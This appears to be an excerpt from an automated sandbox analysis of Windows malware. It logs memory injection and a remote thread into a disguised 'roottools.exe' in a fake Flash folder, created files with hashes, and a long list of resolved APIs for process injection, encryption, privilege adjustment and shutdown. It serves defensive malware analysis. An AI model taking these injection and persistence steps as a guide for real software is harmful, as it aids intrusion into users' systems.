private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt.
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0xb0000, size = 114688 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0xc76c4, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0xc77d0, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0xc7d38, size = 4 True 1
Fn
Data
Create Remote Thread #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0xb95bc True 1
Fn
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt 5.65 KB (5784 bytes) MD5: 9d4f7d11a38b13abfffb23c26855ef96
SHA1: a439414520213ebc9e009ef0280efbc4c442506c
SHA256: e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt 3.15 KB (3224 bytes) MD5: aa11e7edd31a5aa3003171b3ce6a1e63
SHA1: 19f920fe20fb0368145fe224cbb6bc93c1c5db86
SHA256: c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89
False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 0.33 KB (342 bytes) MD5: cd4e3ab8068c33a6b3aec816fe51f106
SHA1: 71c4541a08b266e8e0ba9c0c7f91742e9b5a3511
SHA256: 8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2
False
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: ee5b2511cdb5b31e4749e5955ca9a85a
SHA1: 315d35255f49ceb0f944a7b847a67ec7f9ef15b5
SHA256: 87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af
False
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 0.33 KB (342 bytes) MD5: affe9cecdbfde660607fec2b5edaaa6f
SHA1: 4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e
SHA256: 08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 48.00 KB (49152 bytes) MD5: 9f1ab0535bfe55d2abb1f6e6adf846bd
SHA1: 50f06d017905b347a5155f877fcf966db327dd40
SHA256: 7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: 50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582
SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e
False
Threads
Thread 0x948
(Host: 230, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c True 1
Fn
